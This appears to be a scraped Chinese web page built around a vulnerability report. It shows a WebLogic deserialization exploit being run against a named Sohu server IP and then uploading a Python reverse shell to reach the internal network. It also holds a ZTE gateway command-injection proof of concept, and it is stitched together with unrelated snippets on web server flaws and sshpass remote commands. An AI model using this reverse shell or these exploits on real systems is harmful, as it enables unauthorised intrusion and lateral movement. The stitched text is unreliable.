搜狐某個伺服器配置不當,存在遠端命令執行漏洞 可威脅內網安全
伺服器 123.125.123.26 存在weblogic 反序列化漏洞,沒想到搜狐也存在這樣的漏洞。
python weblogic_exp.py
weblogic unserialize vul is ok 123.125.123.26:8080
webpath: /data3/apps/psoft/webserv/hrout
可以直接上傳乙個指令碼**乙個shell
import socket,subprocess,os
s=socket.socket(socket.af_inet,socket.sock_stream)
s.connect((" ip",23333));os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
先來檢視一下ip,可以發現該伺服器是出於內網的,所以內部資訊可以直接**訪問,或者進一步的滲透
搜狐的內部安全中心
簡單探測下內網。
中興某閘道器裝置存在命令執行漏洞(無需登入)
中興某閘道器裝置存在命令執行漏洞 無需登入 直接給出漏洞的poc modules reporting reporting calllogs export.php?callstart time 1 ifconfig wy.txt callstart time callend time引數存在命令執行 ...
WEB伺服器的常見漏洞
web伺服器的常見漏洞 這篇文章的目的就是向大家介紹web伺服器的常見漏洞,相信看了這篇文章自己也能試著發現一些web伺服器的漏洞了。不過需要記住的是,不要為了尋找漏洞而尋找漏洞。另外,即使你找到了漏洞,是否能夠利用還是另外一回事。web伺服器存在的主要漏洞包括物理路徑洩露,cgi源 洩露,目錄遍歷...
shell登入遠端伺服器執行命令
參考 大概如下 sshpass p password ssh o stricthostkeychecking no root h tt dev null 2 1 remotessh echo i am in h cd dir echo h tests exit remotessh其中 sshpass...